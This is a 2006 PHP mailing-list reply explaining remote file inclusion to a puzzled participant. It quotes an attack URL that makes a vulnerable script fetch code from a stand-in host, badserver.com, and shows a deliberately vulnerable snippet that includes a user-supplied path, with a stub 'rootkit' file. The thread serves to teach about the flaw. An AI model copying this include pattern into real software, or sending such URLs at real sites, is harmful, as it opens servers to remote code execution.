Re: Fwd: [PHP] Highjack?
- From: jochem@xxxxxxxxxxxxx (Jochem Maas)
- Date: Tue, 14 Nov 2006 21:23:13 +0100
tedd wrote:
At 1:39 PM -0500 11/14/06, Chris Shiflett wrote:
tedd wrote:
> The script will then include
> http://www.badserver.com/badscript.txt?dummy=script.php
I still don't see how "badscript.php" can be uploaded into
example.com's site in the first place
PHP sends a request to badserver.com for badscript.txt, and the content
of the response is included just as if it were the content of a local
file.
Hope that helps.
Chris
Chris;
I'm still confused.
At 7:12 PM +0100 11/13/06, Rory Browne wrote:
If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=
If example.com is my domain, then how could evil-doer get access to my
site to place "badscript.php" there?
in this hypothetical situation your a complete moron and you wrote this script:
<?
// lets install their rootkit for them,
// save them having to do it.
if (!isset($path)) $path = 'http://www.badserver.com/badscript.txt?dummy=';
include $path;
?>
and bad script contains:
<?php
function loadRootKit() { /* go */ }
loadRootKit();
?>
of course, in real life your not that stupid at all - but subtler versions of
such vulns occur all of the place :-/
anyway Chris site(s) have lots of info on this subject - I recommend reading till
something sticks (at least that my tactic :-)
.
tedd
- References:
- Re: [PHP] Highjack?
- From: "Eric Butera"
- RE: [PHP] Highjack?
- From: "bruce"
- Fwd: [PHP] Highjack?
- From: "Rory Browne"
- Re: Fwd: [PHP] Highjack?
- From: tedd
- Re: Fwd: [PHP] Highjack?
- From: Chris Shiflett
- Re: Fwd: [PHP] Highjack?
- From: tedd
- Re: [PHP] Highjack?
- Prev by Date: Re: [PHP] php cli and mysql
- Next by Date: Re: [PHP] one click - two actions?
- Previous by thread: RE: Fwd: [PHP] Highjack?
- Next by thread: Re: [PHP] Highjack?
- Index(es):
Relevant Pages
|
|
